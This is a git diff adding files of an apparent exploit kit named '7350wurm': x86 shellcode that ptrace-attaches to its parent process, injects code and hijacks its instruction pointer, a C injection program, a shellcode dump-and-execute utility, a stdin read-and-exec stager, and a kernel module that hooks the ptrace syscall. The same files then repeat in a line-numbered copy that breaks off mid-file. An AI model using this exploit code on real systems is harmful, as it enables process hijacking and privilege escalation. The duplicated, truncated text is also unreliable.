13 files changed, 621 insertions, 0 deletions
diff --git a/exploits/7350wurm/shellcode/bambam.s b/exploits/7350wurm/shellcode/bambam.s
new file mode 100644
index 0000000..5719ed7
--- /dev/null
+++ b/exploits/7350wurm/shellcode/bambam.s
@@ -0,0 +1,230 @@
+        .globl  cbegin
+        .globl  cend
+cbegin:
+/* getppid */
+        pushl   $64
+        popl    %eax
+        int     $0x80
+/*      movl    %eax, %ecx      */
+        pushl   %eax
+        xchgl   %ebp, %eax
+        
+/* z_fork */
+        pushl   $2
+        popl    %eax
+        int     $0x80
+        or      %eax, %eax
+        je      fchild
+        /* waitpid (pid, NULL, 0) */
+        pushl   $7
+        popl    %esi
+        xchgl   %esi, %eax      /* eax = 7, esi = ppid */
+        xorl    %ecx, %ecx
+        xorl    %edx, %edx
+        int     $0x80
+        xorl    %eax, %eax
+        movb    $162, %al
+        pushl   $10
+        pushl   $10
+        movl    %esp, %ebx
+        movl    %esp, %ecx
+        int     $0x80
+ui:
+jmp ui
+        /* exit */
+fexit:  
+        
+        pushl   $1
+        popl    %eax
+        xorl    %ebx, %ebx
+        int     $0x80
+/*** CHILD ***/
+fchild: pushl   $2              /* second fork */
+        popl    %eax
+        int     $0x80
+        or      %eax, %eax
+        jne     fexit
+        popl    %ecx            /* parent process pid */
+/* ptrace attach */
+        pushl   $26
+        popl    %eax
+        cdq
+        pushl   $16
+        popl    %ebx
+        xorl    %esi, %esi
+        int     $0x80
+        
+/* ptrace peekdata */
+        movl    $0x08048210, %edx
+/*      movl    $0xbf7ff010, %edx */
+        movl    $0xbffff010, %esi       
+        pushl   $127
+        popl    %edi
+loopa:
+        movl    %ebp, %ecx
+        pushl   $26
+        popl    %eax
+        pushl   $2
+        popl    %ebx
+        pushl   %edi
+        int     $0x80
+        popl    %edi
+        incl    %edx
+        incl    %esi
+        decl    %edi
+        jnz     loopa
+/* ptrace getregs */
+        movl    %ebp, %ecx
+        pushl   $26
+        popl    %eax
+        pushl   $12
+        popl    %ebx
+        pusha
+        movl    %esp, %esi
+        int     $0x80
+/* ptrace setregs */
+        movl    %ebp, %ecx
+        pushl   $26
+        popl    %eax
+        pushl   $13
+        popl    %ebx
+        movl    %esp, %esi
+        movl    48(%esi), %edi
+        pushl   %edi
+        movl    $0x08048210, 48(%esi)
+/*      movl    $0xbf7ff010, 48(%esi)*/
+        int     $0x80
+        jmp     pointX
+pointY:
+        popl    %esi
+        movl    $0x08048210, %edx
+        pushl   $20
+        popl    %edi
+loopc:
+        movl    %ebp, %ecx
+        pushl   $26
+        popl    %eax
+        pushl   $5
+        popl    %ebx
+        pushl   %edi
+        pushl   %esi
+        movl    (%esi), %esi
+        int     $0x80 
+        popl    %esi
+        popl    %edi
+        incl    %edx
+        incl    %esi
+        decl    %edi
+        jnz     loopc
+/* ptrace pokedata */
+/*      movl    %ebp, %ecx
+        pushl   $26
+        popl    %eax
+        pushl   $5
+        popl    %ebx
+        movl    $0xccccfeeb, %esi*/
+/*      movl    $0xbf7ff010, %edx*/
+        movl    $0x08048210, %edx
+/*      int     $0x80*/
+/*ptrace cont */
+        movl    %ebp, %ecx
+        pushl   $26
+        popl    %eax
+        cdq
+        pushl   $7
+        popl    %ebx
+        xorl    %esi, %esi
+        int     $0x80
+/* wait 4 */
+/* 0 on return */
+        cdq
+        movl    %eax, %ebx
+        decl    %ebx
+        movl    %eax, %ecx
+        movb    $114, %al
+        int     $0x80   
+/* ptrace pokedata */   
+        movl    $0x08048210, %edx
+        movl    $0xbffff010, %esi
+/*      movl    $0xbf7ff010, %edx*/
+        pushl   $127
+        popl    %edi
+loopb:
+        movl    %ebp, %ecx
+        pushl   $26
+        popl    %eax
+        pushl   $5
+        popl    %ebx
+        pushl   %edi
+        pushl   %esi
+        movl    (%esi), %esi
+        int     $0x80 
+        popl    %esi
+        popl    %edi
+        incl    %edx
+        incl    %esi
+        decl    %edi
+        jnz     loopb
+/* ptrace setregs */
+        popl    %edi
+        movl    %ebp, %ecx
+        pushl   $26
+        popl    %eax
+        pushl   $13
+        popl    %ebx
+        movl    %esp, %esi
+        movl    %edi, 48(%esi)
+        int     $0x80
+/* ptrace detach */
+        movl    %ebp, %ecx
+        pushl   $17
+        popl    %ebx
+        pushl   $26
+        popl    %eax
+        cdq
+        movl    %edx, %esi
+        int     $0x80
+/* exit */      
+        xorl    %ecx, %ecx
+        incl    %esi
+        xchgl   %esi, %eax
+        int     $0x80
+pointX:
+        call    pointY
+        pushl   $2              /* second fork */
+        popl    %eax
+        int     $0x80
+        or      %eax, %eax
+        je      pointA
+        int     $0x3
+pointA: 
+        jmp     pointA
+        
+        
+                
+        
+cend:
diff --git a/exploits/7350wurm/shellcode/codedump b/exploits/7350wurm/shellcode/codedump
new file mode 100644
index 0000000..d442fa7
--- /dev/null
+++ b/exploits/7350wurm/shellcode/codedump
Binary files differ
diff --git a/exploits/7350wurm/shellcode/codedump.c b/exploits/7350wurm/shellcode/codedump.c
new file mode 100644
index 0000000..9494b9e
--- /dev/null
+++ b/exploits/7350wurm/shellcode/codedump.c
@@ -0,0 +1,93 @@
+/* shellcode extraction utility,
+ * by type / teso, small mods by scut.
+ */
+#include <stdio.h>
+#include <stdlib.h>
+#include <ctype.h>
+#ifdef IRIX
+#include <sys/cachectl.h>
+#endif
+#ifdef HPUX
+extern char *   cbegin;
+extern char *   cend;
+#else
+extern void     cbegin ();
+extern void     cend ();
+#endif
+typedef void (* fptr)(void);
+int
+bad (unsigned char u);
+int
+main (int argc, char *argv[])
+{
+        int             i,
+                        bbytes = 0;
+        unsigned char * buf = (unsigned char *) cbegin;
+        unsigned char   ebuf[1024];
+        fptr            ebuf_p = (fptr) &ebuf[0];
+        fprintf (stderr, "/* %lu byte shellcode */\n",
+                (unsigned long int) cend - (unsigned long int) cbegin);
+        for (i = 0 ; buf < (unsigned char *) cend; ++buf) {
+                if (i % 12 == 0 && buf > (unsigned char *) cbegin)
+                        printf ("\n");
+                if (i % 12 == 0)
+                        printf ("\"");
+                if (bad (*buf & 0xff)) {
+                        printf ("_\\x%02x_", *buf & 0xff);
+                        bbytes += 1;
+                } else {
+                        printf ("\\x%02x", *buf & 0xff);
+                }
+                if (++i >= 12) {
+                        i = 0;
+                        printf ("\"");
+                }
+        }
+        if (i % 12 == 0)
+                printf (";\n");
+        else
+                printf ("\";\n");
+        printf("\n");
+        fprintf (stderr, "bad bytes = %d\n", bbytes);
+        if (argc > 1) {
+                memcpy (ebuf, cbegin, (unsigned long int) cend -
+                        (unsigned long int) cbegin);
+#ifdef IRIX
+                memcpy (ebuf + ((unsigned long int) cend -
+                        (unsigned long int) cbegin), "/bin/sh\x42_ABCDEFGHIJKLMNOPQRSTUVWXYZ", 40);
+                cacheflush (ebuf, sizeof (ebuf), BCACHE);
+#endif
+                ebuf_p ();
+        }
+        exit (EXIT_SUCCESS);
+}
+int
+bad (unsigned char u)
+{
+        if (u == '\x00' || u == '\x0a' || u == '\x0d' || u == '\x25')
+                return (1);
+        return (0);
+}
diff --git a/exploits/7350wurm/shellcode/pt/Makefile b/exploits/7350wurm/shellcode/pt/Makefile
new file mode 100644
index 0000000..e5e1fd5
--- /dev/null
+++ b/exploits/7350wurm/shellcode/pt/Makefile
@@ -0,0 +1,8 @@
+all:    rptrace.c
+        rm -f rptrace.o
+        gcc -c -I/usr/src/linux/include -O2 -Wall rptrace.c -o rptrace.o
+clean:
+        rm -f rptrace.o
diff --git a/exploits/7350wurm/shellcode/pt/README b/exploits/7350wurm/shellcode/pt/README
new file mode 100644
index 0000000..0139382
--- /dev/null
+++ b/exploits/7350wurm/shellcode/pt/README
@@ -0,0 +1,6 @@
+This is a *simple* HACK to get around the ptrace/exec security problem
+in linux <2.2.19. It simply disables ptrace for everyone except root.
+Just make, and insmod the .o .. and your uptime will be preserved! :P
+-MadCamel (madcamel@energymech.net)
diff --git a/exploits/7350wurm/shellcode/pt/rptrace.c b/exploits/7350wurm/shellcode/pt/rptrace.c
new file mode 100644
index 0000000..f7de48b
--- /dev/null
+++ b/exploits/7350wurm/shellcode/pt/rptrace.c
@@ -0,0 +1,42 @@
+#define MODULE
+#define __KERNEL__
+#include <linux/module.h> 
+#include <linux/kernel.h>
+#include <sys/syscall.h>
+#include <linux/smp_lock.h>
+#include <linux/capability.h>  
+struct task_struct *init_hook = NULL;
+extern void *sys_call_table[];
+int (*o_ptrace)(int, int, int, int);
+int n_ptrace(int req, int pid, int addr, int data)
+{
+        int r;
+        
+        r = o_ptrace(req, pid, addr, data);
+        printk ("PTRACE (%08x, %08x, %08x, %08x) = %08x\n", req, pid, addr, data, r);
+        return (r);
+}
+#define REPLACE(x) o_##x = sys_call_table[__NR_##x];\
+                        sys_call_table[__NR_##x] = n_##x
+int init_module(void)
+{
+        lock_kernel();
+        EXPORT_NO_SYMBOLS;
+        REPLACE(ptrace);
+        unlock_kernel();
+        return(0);
+}
+#define RESTORE(x) sys_call_table[__NR_##x] = o_##x
+int cleanup_module(void)
+{
+        lock_kernel();
+        RESTORE(ptrace);
+        unlock_kernel();
+        return(0);
+}
diff --git a/exploits/7350wurm/shellcode/pt/rptrace.o b/exploits/7350wurm/shellcode/pt/rptrace.o
new file mode 100644
index 0000000..dd3bc56
--- /dev/null
+++ b/exploits/7350wurm/shellcode/pt/rptrace.o
Binary files differ
diff --git a/exploits/7350wurm/shellcode/pt/x.tar.gz b/exploits/7350wurm/shellcode/pt/x.tar.gz
new file mode 100644
index 0000000..06ba614
--- /dev/null
+++ b/exploits/7350wurm/shellcode/pt/x.tar.gz
Binary files differ
diff --git a/exploits/7350wurm/shellcode/ptrace/ptrace-legit b/exploits/7350wurm/shellcode/ptrace/ptrace-legit
new file mode 100644
index 0000000..e3e02c1
--- /dev/null
+++ b/exploits/7350wurm/shellcode/ptrace/ptrace-legit
Binary files differ
diff --git a/exploits/7350wurm/shellcode/ptrace/ptrace-legit.c b/exploits/7350wurm/shellcode/ptrace/ptrace-legit.c
new file mode 100644
index 0000000..870da8a
--- /dev/null
+++ b/exploits/7350wurm/shellcode/ptrace/ptrace-legit.c
@@ -0,0 +1,192 @@
+/* -scutstyle */
+#include <sys/types.h>
+#include <sys/ptrace.h>
+#include <sys/wait.h>
+#include <sys/user.h>
+#include <unistd.h>
+#include <stdlib.h>
+#include <stdio.h>
+pid_t z_fork (void);
+void hexdump (unsigned char *data, unsigned int amount);
+unsigned char   shellcode[] = "\x90\x90\xcc\x73";
+int
+main (int argc, char *argv[])
+{
+        pid_t                   cpid;
+        struct user             regs;
+        unsigned long int       safed_eip;
+        unsigned long int       addr,
+                                addr_walker;
+        unsigned char           data_saved[256];
+#if 0
+        if (argc != 2 || sscanf (argv[1], "%d", &cpid) != 1) {
+                printf ("usage: %s <pid>\n", argv[0]);
+                exit (EXIT_FAILURE);
+        }
+#endif
+        cpid = getppid();
+        if (z_fork () != 0) {
+                printf ("parent. exiting.\n");
+                exit (EXIT_FAILURE);
+        }
+        printf ("pid = %d\n", cpid);
+        printf ("exploiting\n\n");
+        if (ptrace (PTRACE_ATTACH, cpid, NULL, NULL) < 0) {
+                perror ("ptrace");
+                exit (EXIT_FAILURE);
+        }
+        /* save data */
+        addr = 0xbffff010;
+        for (addr_walker = 0 ; addr_walker < 256 ; ++addr_walker) {
+                data_saved[addr_walker] = ptrace (PTRACE_PEEKDATA, cpid,
+                        addr + addr_walker, NULL);
+        }
+        hexdump (data_saved, sizeof (data_saved));
+        /* write */
+        for (addr_walker = 0 ; addr_walker < sizeof (shellcode) ;
+                ++addr_walker)
+        {
+                ptrace (PTRACE_POKEDATA, cpid, addr + addr_walker,
+                        shellcode[addr_walker] & 0xff);
+        }
+        /* redirect eip */
+        memset (&regs, 0, sizeof (regs));
+        if (ptrace (PTRACE_GETREGS, cpid, NULL, &regs) < 0) {
+                perror ("ptrace PTRACE_GETREGS");
+                exit (EXIT_FAILURE);
+        }
+        // write eip */
+        safed_eip = regs.regs.eip;
+        regs.regs.eip = 0xbffff010;
+        if (ptrace (PTRACE_SETREGS, cpid, NULL, &regs) < 0) {
+                perror ("ptrace PTRACE_GETREGS");
+                exit (EXIT_FAILURE);
+        }
+        if (ptrace (PTRACE_CONT, cpid, NULL, NULL) < 0) {
+                perror ("ptrace PTRACE_CONT");
+                exit (EXIT_FAILURE);
+        }
+        wait (NULL);
+        printf ("detrap\n");
+        /* restore */
+        for (addr_walker = 0 ; addr_walker < 256 ; ++addr_walker) {
+                ptrace (PTRACE_POKEDATA, cpid, addr + addr_walker,
+                        data_saved[addr_walker] & 0xff);
+        }
+        /* restore regs */
+        regs.regs.eip = safed_eip;
+        if (ptrace (PTRACE_SETREGS, cpid, NULL, &regs) < 0) {
+                perror ("ptrace PTRACE_GETREGS");
+                exit (EXIT_FAILURE);
+        }
+        if (ptrace (PTRACE_DETACH, cpid, NULL, NULL) < 0) {
+                perror ("ptrace PTRACE_DETACH");
+                exit (EXIT_FAILURE);
+        }
+        exit (EXIT_SUCCESS);
+}
+void
+hexdump (unsigned char *data, unsigned int amount)
+{
+        unsigned int    dp, p;  /* data pointer */
+        const char      trans[] =
+                "................................ !\"#$%&'()*+,-./0123456789"
+                ":;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklm"
+                "nopqrstuvwxyz{|}~...................................."
+                "....................................................."
+                "........................................";
+        for (dp = 1; dp <= amount; dp++) {
+                printf ("%02x ", data[dp-1]);
+                if ((dp % 8) == 0)
+                        printf (" ");
+                if ((dp % 16) == 0) {
+                        printf ("| ");
+                        p = dp;
+                        for (dp -= 16; dp < p; dp++)
+                                printf ("%c", trans[data[dp]]);
+                        printf ("\n");
+                }
+        }
+        if ((amount % 16) != 0) {
+                p = dp = 16 - (amount % 16);
+                for (dp = p; dp > 0; dp--) {
+                        printf ("   ");
+                        if (((dp % 8) == 0) && (p != 8))
+                                printf (" ");
+                }
+                printf (" | ");
+                for (dp = (amount - (16 - p)); dp < amount; dp++)
+                        printf ("%c", trans[data[dp]]);
+        }
+        printf ("\n");
+        return;
+}
+/* z_fork
+ *
+ * fork and detach forked client completely to avoid zombies.
+ * taken from richard stevens excellent system programming book :) thanks,
+ * whereever you are now.
+ *
+ * caveat: the pid of the child has already died, it can just be used to
+ *         differentiate between parent and not parent, the pid of the
+ *         child is inaccessibly.
+ *
+ * return pid of child for old process
+ * return 0 for child
+ */
+pid_t
+z_fork (void)
+{
+        pid_t   pid;
+        pid = fork ();
+        if (pid < 0) {
+                return (pid);
+        } else if (pid == 0) {
+                /* let the child fork again
+                 */
+                pid = fork ();
+                if (pid < 0) {
+                        return (pid);
+                } else if (pid > 0) {
+                        /* let the child and parent of the second child
+                         * exit
+                         */
+                        exit (EXIT_SUCCESS);
+                }
+                return (0);
+        }
+        waitpid (pid, NULL, 0);
+        return (pid);
+}
diff --git a/exploits/7350wurm/shellcode/t b/exploits/7350wurm/shellcode/t
new file mode 100644
index 0000000..eb3478b
--- /dev/null
+++ b/exploits/7350wurm/shellcode/t
Binary files differ
diff --git a/exploits/7350wurm/shellcode/t.c b/exploits/7350wurm/shellcode/t.c
new file mode 100644
index 0000000..7c1aa4f
--- /dev/null
+++ b/exploits/7350wurm/shellcode/t.c
@@ -0,0 +1,12 @@
+#include <stdio.h>
+int
+main (int argc, char *argv[])
+{
+        char *  foo[4] = { "./codedump", "a", "b", NULL };
+        execve (foo[0], foo, NULL);
+}
diff --git a/exploits/7350wurm/shellcode/write-read-exec.s b/exploits/7350wurm/shellcode/write-read-exec.s
new file mode 100644
index 0000000..6f3956c
--- /dev/null
+++ b/exploits/7350wurm/shellcode/write-read-exec.s
@@ -0,0 +1,38 @@
+        .globl  cbegin
+        .globl  cend
+cbegin:
+/* write: ebx = fd, ecx = where, edx = length, eax = 4 */
+wr_pos: xorl    %ebx, %ebx
+        incl    %ebx            /* ebx = 1 */
+        movl    $0x0b51740b, %eax
+        subl    $0x01010101, %eax
+        push    %eax
+        movl    %esp, %ecx      /* ecx = "AAA\n" */
+        push    $0x04
+        pop     %eax            /* eax = 4 */
+        movl    %eax, %edx
+        int     $0x80           /* write (1, "AAA\n", 4) */
+        jmp     ctramp
+rd_cde: xorl    %ebx, %ebx
+        mull    %ebx            /* ebx = eax = edx = 0 */
+        decb    %dl             /* edx = 0xff */
+        popl    %ecx            /* ecx = ncode */
+        push    $0x3
+        pop     %eax
+        int     $0x80           /* read (0, ncode, 0xff) */
+        jmp     ncode
+ctramp: call    rd_cde
+ncode:
+cend:

diff --git a/exploits/7350wurm/shellcode/bambam.s b/exploits/7350wurm/shellcode/bambam.s new file mode 100644 index 0000000..5719ed7 --- /dev/null +++ b/exploits/7350wurm/shellcode/bambam.s
@@ -0,0 +1,230 @@
	1
	2	.globl cbegin
	3	.globl cend
	4
	5
	6	cbegin:
	7	/* getppid */
	8	pushl $64
	9	popl %eax
	10	int $0x80
	11	/* movl %eax, %ecx */
	12	pushl %eax
	13	xchgl %ebp, %eax
	14
	15	/* z_fork */
	16	pushl $2
	17	popl %eax
	18	int $0x80
	19	or %eax, %eax
	20	je fchild
	21
	22	/* waitpid (pid, NULL, 0) */
	23	pushl $7
	24	popl %esi
	25	xchgl %esi, %eax /* eax = 7, esi = ppid */
	26	xorl %ecx, %ecx
	27	xorl %edx, %edx
	28	int $0x80
	29
	30	xorl %eax, %eax
	31	movb $162, %al
	32	pushl $10
	33	pushl $10
	34	movl %esp, %ebx
	35	movl %esp, %ecx
	36	int $0x80
	37	ui:
	38	jmp ui
	39	/* exit */
	40	fexit:
	41
	42	pushl $1
	43	popl %eax
	44	xorl %ebx, %ebx
	45	int $0x80
	46
	47	/* CHILD */
	48	fchild: pushl $2 /* second fork */
	49	popl %eax
	50	int $0x80
	51
	52	or %eax, %eax
	53	jne fexit
	54
	55	popl %ecx /* parent process pid */
	56	/* ptrace attach */
	57	pushl $26
	58	popl %eax
	59	cdq
	60	pushl $16
	61	popl %ebx
	62	xorl %esi, %esi
	63	int $0x80
	64
	65	/* ptrace peekdata */
	66	movl $0x08048210, %edx
	67	/* movl $0xbf7ff010, %edx */
	68	movl $0xbffff010, %esi
	69	pushl $127
	70	popl %edi
	71	loopa:
	72	movl %ebp, %ecx
	73	pushl $26
	74	popl %eax
	75	pushl $2
	76	popl %ebx
	77	pushl %edi
	78	int $0x80
	79	popl %edi
	80	incl %edx
	81	incl %esi
	82	decl %edi
	83	jnz loopa
	84
	85	/* ptrace getregs */
	86	movl %ebp, %ecx
	87	pushl $26
	88	popl %eax
	89	pushl $12
	90	popl %ebx
	91	pusha
	92	movl %esp, %esi
	93	int $0x80
	94
	95	/* ptrace setregs */
	96	movl %ebp, %ecx
	97	pushl $26
	98	popl %eax
	99	pushl $13
	100	popl %ebx
	101	movl %esp, %esi
	102	movl 48(%esi), %edi
	103	pushl %edi
	104	movl $0x08048210, 48(%esi)
	105	/* movl $0xbf7ff010, 48(%esi)*/
	106	int $0x80
	107
	108	jmp pointX
	109	pointY:
	110
	111	popl %esi
	112	movl $0x08048210, %edx
	113	pushl $20
	114	popl %edi
	115	loopc:
	116	movl %ebp, %ecx
	117	pushl $26
	118	popl %eax
	119	pushl $5
	120	popl %ebx
	121	pushl %edi
	122	pushl %esi
	123	movl (%esi), %esi
	124	int $0x80
	125	popl %esi
	126	popl %edi
	127	incl %edx
	128	incl %esi
	129	decl %edi
	130	jnz loopc
	131
	132
	133	/* ptrace pokedata */
	134	/* movl %ebp, %ecx
	135	pushl $26
	136	popl %eax
	137	pushl $5
	138	popl %ebx
	139	movl $0xccccfeeb, %esi*/
	140	/* movl $0xbf7ff010, %edx*/
	141	movl $0x08048210, %edx
	142	/* int $0x80*/
	143
	144	/ptrace cont /
	145	movl %ebp, %ecx
	146	pushl $26
	147	popl %eax
	148	cdq
	149	pushl $7
	150	popl %ebx
	151	xorl %esi, %esi
	152	int $0x80
	153
	154	/* wait 4 */
	155	/* 0 on return */
	156	cdq
	157	movl %eax, %ebx
	158	decl %ebx
	159	movl %eax, %ecx
	160	movb $114, %al
	161	int $0x80
	162
	163	/* ptrace pokedata */
	164	movl $0x08048210, %edx
	165	movl $0xbffff010, %esi
	166	/* movl $0xbf7ff010, %edx*/
	167	pushl $127
	168	popl %edi
	169	loopb:
	170	movl %ebp, %ecx
	171	pushl $26
	172	popl %eax
	173	pushl $5
	174	popl %ebx
	175	pushl %edi
	176	pushl %esi
	177	movl (%esi), %esi
	178	int $0x80
	179	popl %esi
	180	popl %edi
	181	incl %edx
	182	incl %esi
	183	decl %edi
	184	jnz loopb
	185
	186	/* ptrace setregs */
	187	popl %edi
	188	movl %ebp, %ecx
	189	pushl $26
	190	popl %eax
	191	pushl $13
	192	popl %ebx
	193	movl %esp, %esi
	194	movl %edi, 48(%esi)
	195	int $0x80
	196
	197
	198	/* ptrace detach */
	199	movl %ebp, %ecx
	200	pushl $17
	201	popl %ebx
	202	pushl $26
	203	popl %eax
	204	cdq
	205	movl %edx, %esi
	206	int $0x80
	207	/* exit */
	208	xorl %ecx, %ecx
	209	incl %esi
	210	xchgl %esi, %eax
	211	int $0x80
	212	pointX:
	213	call pointY
	214
	215	pushl $2 /* second fork */
	216	popl %eax
	217	int $0x80
	218	or %eax, %eax
	219	je pointA
	220	int $0x3
	221	pointA:
	222	jmp pointA
	223
	224
	225
	226
	227
	228	cend:
	229
	230


diff --git a/exploits/7350wurm/shellcode/codedump b/exploits/7350wurm/shellcode/codedump new file mode 100644 index 0000000..d442fa7 --- /dev/null +++ b/exploits/7350wurm/shellcode/codedump
Binary files differ


diff --git a/exploits/7350wurm/shellcode/codedump.c b/exploits/7350wurm/shellcode/codedump.c new file mode 100644 index 0000000..9494b9e --- /dev/null +++ b/exploits/7350wurm/shellcode/codedump.c
@@ -0,0 +1,93 @@
	1	/* shellcode extraction utility,
	2	* by type / teso, small mods by scut.
	3	*/
	4
	5
	6	#include <stdio.h>
	7	#include <stdlib.h>
	8	#include <ctype.h>
	9
	10	#ifdef IRIX
	11	#include <sys/cachectl.h>
	12	#endif
	13
	14	#ifdef HPUX
	15	extern char * cbegin;
	16	extern char * cend;
	17	#else
	18	extern void cbegin ();
	19	extern void cend ();
	20	#endif
	21
	22	typedef void (* fptr)(void);
	23
	24	int
	25	bad (unsigned char u);
	26
	27
	28	int
	29	main (int argc, char *argv[])
	30	{
	31	int i,
	32	bbytes = 0;
	33	unsigned char * buf = (unsigned char *) cbegin;
	34
	35	unsigned char ebuf[1024];
	36	fptr ebuf_p = (fptr) &ebuf[0];
	37
	38
	39	fprintf (stderr, "/* %lu byte shellcode */\n",
	40	(unsigned long int) cend - (unsigned long int) cbegin);
	41
	42	for (i = 0 ; buf < (unsigned char *) cend; ++buf) {
	43	if (i % 12 == 0 && buf > (unsigned char *) cbegin)
	44	printf ("\n");
	45	if (i % 12 == 0)
	46	printf ("\"");
	47
	48	if (bad (*buf & 0xff)) {
	49	printf ("_\\x%02x_", *buf & 0xff);
	50	bbytes += 1;
	51	} else {
	52	printf ("\\x%02x", *buf & 0xff);
	53	}
	54
	55	if (++i >= 12) {
	56	i = 0;
	57	printf ("\"");
	58	}
	59	}
	60	if (i % 12 == 0)
	61	printf (";\n");
	62	else
	63	printf ("\";\n");
	64
	65	printf("\n");
	66
	67	fprintf (stderr, "bad bytes = %d\n", bbytes);
	68
	69	if (argc > 1) {
	70	memcpy (ebuf, cbegin, (unsigned long int) cend -
	71	(unsigned long int) cbegin);
	72	#ifdef IRIX
	73	memcpy (ebuf + ((unsigned long int) cend -
	74	(unsigned long int) cbegin), "/bin/sh\x42_ABCDEFGHIJKLMNOPQRSTUVWXYZ", 40);
	75	cacheflush (ebuf, sizeof (ebuf), BCACHE);
	76	#endif
	77	ebuf_p ();
	78	}
	79
	80	exit (EXIT_SUCCESS);
	81	}
	82
	83
	84	int
	85	bad (unsigned char u)
	86	{
	87	if (u == '\x00' \|\| u == '\x0a' \|\| u == '\x0d' \|\| u == '\x25')
	88	return (1);
	89
	90	return (0);
	91	}
	92
	93


diff --git a/exploits/7350wurm/shellcode/pt/Makefile b/exploits/7350wurm/shellcode/pt/Makefile new file mode 100644 index 0000000..e5e1fd5 --- /dev/null +++ b/exploits/7350wurm/shellcode/pt/Makefile
@@ -0,0 +1,8 @@
	1
	2	all: rptrace.c
	3	rm -f rptrace.o
	4	gcc -c -I/usr/src/linux/include -O2 -Wall rptrace.c -o rptrace.o
	5
	6	clean:
	7	rm -f rptrace.o
	8


diff --git a/exploits/7350wurm/shellcode/pt/README b/exploits/7350wurm/shellcode/pt/README new file mode 100644 index 0000000..0139382 --- /dev/null +++ b/exploits/7350wurm/shellcode/pt/README
@@ -0,0 +1,6 @@
	1	This is a simple HACK to get around the ptrace/exec security problem
	2	in linux <2.2.19. It simply disables ptrace for everyone except root.
	3	Just make, and insmod the .o .. and your uptime will be preserved! :P
	4
	5	-MadCamel (madcamel@energymech.net)
	6


diff --git a/exploits/7350wurm/shellcode/pt/rptrace.c b/exploits/7350wurm/shellcode/pt/rptrace.c new file mode 100644 index 0000000..f7de48b --- /dev/null +++ b/exploits/7350wurm/shellcode/pt/rptrace.c
@@ -0,0 +1,42 @@
	1	#define MODULE
	2	#define __KERNEL__
	3	#include <linux/module.h>
	4	#include <linux/kernel.h>
	5	#include <sys/syscall.h>
	6	#include <linux/smp_lock.h>
	7	#include <linux/capability.h>
	8
	9	struct task_struct *init_hook = NULL;
	10	extern void *sys_call_table[];
	11
	12	int (*o_ptrace)(int, int, int, int);
	13
	14	int n_ptrace(int req, int pid, int addr, int data)
	15	{
	16	int r;
	17
	18	r = o_ptrace(req, pid, addr, data);
	19	printk ("PTRACE (%08x, %08x, %08x, %08x) = %08x\n", req, pid, addr, data, r);
	20	return (r);
	21	}
	22
	23	#define REPLACE(x) o_##x = sys_call_table[__NR_##x];\
	24	sys_call_table[__NR_##x] = n_##x
	25	int init_module(void)
	26	{
	27	lock_kernel();
	28	EXPORT_NO_SYMBOLS;
	29	REPLACE(ptrace);
	30	unlock_kernel();
	31	return(0);
	32	}
	33
	34	#define RESTORE(x) sys_call_table[__NR_##x] = o_##x
	35	int cleanup_module(void)
	36	{
	37	lock_kernel();
	38	RESTORE(ptrace);
	39	unlock_kernel();
	40	return(0);
	41	}
	42


diff --git a/exploits/7350wurm/shellcode/pt/rptrace.o b/exploits/7350wurm/shellcode/pt/rptrace.o new file mode 100644 index 0000000..dd3bc56 --- /dev/null +++ b/exploits/7350wurm/shellcode/pt/rptrace.o
Binary files differ


diff --git a/exploits/7350wurm/shellcode/pt/x.tar.gz b/exploits/7350wurm/shellcode/pt/x.tar.gz new file mode 100644 index 0000000..06ba614 --- /dev/null +++ b/exploits/7350wurm/shellcode/pt/x.tar.gz
Binary files differ


diff --git a/exploits/7350wurm/shellcode/ptrace/ptrace-legit b/exploits/7350wurm/shellcode/ptrace/ptrace-legit new file mode 100644 index 0000000..e3e02c1 --- /dev/null +++ b/exploits/7350wurm/shellcode/ptrace/ptrace-legit
Binary files differ


diff --git a/exploits/7350wurm/shellcode/ptrace/ptrace-legit.c b/exploits/7350wurm/shellcode/ptrace/ptrace-legit.c new file mode 100644 index 0000000..870da8a --- /dev/null +++ b/exploits/7350wurm/shellcode/ptrace/ptrace-legit.c
@@ -0,0 +1,192 @@
	1	/* -scutstyle */
	2
	3	#include <sys/types.h>
	4	#include <sys/ptrace.h>
	5	#include <sys/wait.h>
	6	#include <sys/user.h>
	7	#include <unistd.h>
	8	#include <stdlib.h>
	9	#include <stdio.h>
	10
	11
	12	pid_t z_fork (void);
	13	void hexdump (unsigned char *data, unsigned int amount);
	14
	15	unsigned char shellcode[] = "\x90\x90\xcc\x73";
	16
	17	int
	18	main (int argc, char *argv[])
	19	{
	20	pid_t cpid;
	21	struct user regs;
	22	unsigned long int safed_eip;
	23	unsigned long int addr,
	24	addr_walker;
	25	unsigned char data_saved[256];
	26
	27
	28	#if 0
	29	if (argc != 2 \|\| sscanf (argv[1], "%d", &cpid) != 1) {
	30	printf ("usage: %s <pid>\n", argv[0]);
	31	exit (EXIT_FAILURE);
	32	}
	33	#endif
	34	cpid = getppid();
	35	if (z_fork () != 0) {
	36	printf ("parent. exiting.\n");
	37	exit (EXIT_FAILURE);
	38	}
	39
	40	printf ("pid = %d\n", cpid);
	41
	42	printf ("exploiting\n\n");
	43
	44	if (ptrace (PTRACE_ATTACH, cpid, NULL, NULL) < 0) {
	45	perror ("ptrace");
	46	exit (EXIT_FAILURE);
	47	}
	48
	49	/* save data */
	50	addr = 0xbffff010;
	51	for (addr_walker = 0 ; addr_walker < 256 ; ++addr_walker) {
	52	data_saved[addr_walker] = ptrace (PTRACE_PEEKDATA, cpid,
	53	addr + addr_walker, NULL);
	54	}
	55	hexdump (data_saved, sizeof (data_saved));
	56
	57	/* write */
	58	for (addr_walker = 0 ; addr_walker < sizeof (shellcode) ;
	59	++addr_walker)
	60	{
	61	ptrace (PTRACE_POKEDATA, cpid, addr + addr_walker,
	62	shellcode[addr_walker] & 0xff);
	63	}
	64
	65	/* redirect eip */
	66	memset (&regs, 0, sizeof (regs));
	67	if (ptrace (PTRACE_GETREGS, cpid, NULL, &regs) < 0) {
	68	perror ("ptrace PTRACE_GETREGS");
	69	exit (EXIT_FAILURE);
	70	}
	71	// write eip */
	72	safed_eip = regs.regs.eip;
	73	regs.regs.eip = 0xbffff010;
	74	if (ptrace (PTRACE_SETREGS, cpid, NULL, &regs) < 0) {
	75	perror ("ptrace PTRACE_GETREGS");
	76	exit (EXIT_FAILURE);
	77	}
	78
	79	if (ptrace (PTRACE_CONT, cpid, NULL, NULL) < 0) {
	80	perror ("ptrace PTRACE_CONT");
	81	exit (EXIT_FAILURE);
	82	}
	83
	84	wait (NULL);
	85	printf ("detrap\n");
	86
	87	/* restore */
